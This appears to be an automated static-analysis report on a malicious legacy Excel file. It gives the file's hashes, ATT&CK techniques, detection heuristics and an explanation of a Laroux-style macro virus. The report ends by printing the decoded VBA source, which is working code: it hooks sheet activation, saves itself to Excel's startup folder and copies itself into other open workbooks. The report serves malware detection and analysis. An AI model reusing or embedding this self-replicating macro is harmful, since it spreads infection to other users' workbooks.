Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e4f73b71f6258967…

MALICIOUS

Office (OLE)

Size: 89.0 KB
Created: 2001-07-07 11:02:23
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 6b8b0f7ea02a0bc4b723212845f40f64
SHA-1: 8247dff3f07c10f3717e1f60addc02c1b3b652d3
SHA-256: e4f73b71f62589676755d6d9d3f59c555d7f37642810f60f2e15d33885f3e85f
120 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

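The sample is an Excel 5 macro-virus, identified by the 'LAROUX_MACRO_VIRUS' heuristic. Its auto_open macro sets Application.OnSheetActivate to the SearchSelf routine. When 'nt².xls' is not yet present in the Excel startup directory, SearchSelf copies the 'nt²' sheet into a new workbook and saves it there under that name; when the file is already present, SearchSelf copies the 'nt²' sheet into the active workbook if that workbook's first sheet is not already 'nt²'. Workbooks in the startup directory are loaded whenever Excel starts, so this is a persistence mechanism that ensures the macro executes whenever Excel is opened.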

Heuristics 3

  • Excel 5 Laroux/Larou-CV macro-virus marker cluster (severity: critical, ID: OLE_XLS5_LAROUX_MACRO_VIRUS)
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected (severity: medium, ID: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, ID: OLE_VBA_AUTO)
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 992 bytes
SHA-256: 988293333aca021b00ff357edb9be3afdd8692a68a0b0d11e8f93f0190dc554c
First 1,000 lines of the extracted script
Attribute VB_Name = "nt²"









Private Sub auto_open()
    Application.OnSheetActivate = "SearchSelf"
End Sub

Private Static Sub SearchSelf()
On Error Resume Next
Const Self As String = "nt².xls"
Dim Resident As Boolean, strCurrDir As String

    Application.ScreenUpdating = False
    Resident = Dir(Application.StartupPath & "\" & Self) = Self
    If Resident Then
       If ActiveWorkbook.Sheets(1).Name <> "nt²" Then
           Workbooks(Self).Sheets("nt²").Copy before:=ActiveWorkbook.Sheets(1)
       End If
    Else
        Sheets("nt²").Select: Sheets("nt²").Copy
        strCurrDir = CurDir()
        ChDir Application.StartupPath
        Workbooks(ActiveWorkbook.Name).SaveAs FileName:=Application.StartupPath & "\" & Self
        ChDir strCurrDir
        ActiveWindow.Visible = False
        Workbooks(Self).Save
    End If
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "nt².xls!SearchSelf"
    
End Sub